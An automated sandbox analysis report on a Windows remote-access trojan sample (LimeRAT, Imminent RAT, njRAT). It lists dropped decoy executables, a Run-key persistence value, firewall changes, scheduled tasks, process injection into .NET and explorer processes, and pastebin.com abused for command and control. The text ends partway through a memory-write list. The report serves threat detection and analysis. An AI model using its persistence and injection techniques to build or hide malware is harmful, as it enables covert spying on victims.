Malware Analysis Report

2024-09-11 09:59

Sample ID 240426-ys4tlsca6s
Target 018e93f66899228a3e980f8fa671c021_JaffaCakes118
SHA256 46141664081fd940edcf0db0adcd081736a3bd5e2f9639037fc598e558104b31
Tags
imminent limerat njrat evasion persistence rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

46141664081fd940edcf0db0adcd081736a3bd5e2f9639037fc598e558104b31

Threat Level: Known bad

The file 018e93f66899228a3e980f8fa671c021_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

imminent limerat njrat evasion persistence rat spyware trojan

LimeRAT

Imminent RAT

njRAT/Bladabindi

Modifies Windows Firewall

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Maps connected drives based on registry

Looks up external IP address via web service

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

AutoIT Executable

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Scheduled Task/Job
T1053
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Impair Defenses
T1562
Disable or Modify System Firewall
T1562.004
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-04-26 20:03

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-26 20:03

Reported

2024-04-26 20:06

Platform

win7-20240419-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe"

Signatures

Imminent RAT

trojan spyware imminent

LimeRAT

rat limerat

njRAT/Bladabindi

trojan njrat

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe N/A
N/A N/A C:\Users\Admin\secinit\sdchange.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe N/A
N/A N/A C:\Users\Admin\secinit\sdchange.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetFramework.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NetFramework.exe" C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetFramework.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NetFramework.exe" C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2672 set thread context of 2744 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2956 set thread context of 2776 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2960 set thread context of 1996 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 592 set thread context of 2600 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2580 set thread context of 1108 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2432 set thread context of 2160 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 980 set thread context of 2488 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2724 set thread context of 2796 N/A C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2428 set thread context of 2808 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2272 set thread context of 2224 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2956 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 2956 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 2956 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 2956 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 2956 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 2956 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 2956 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
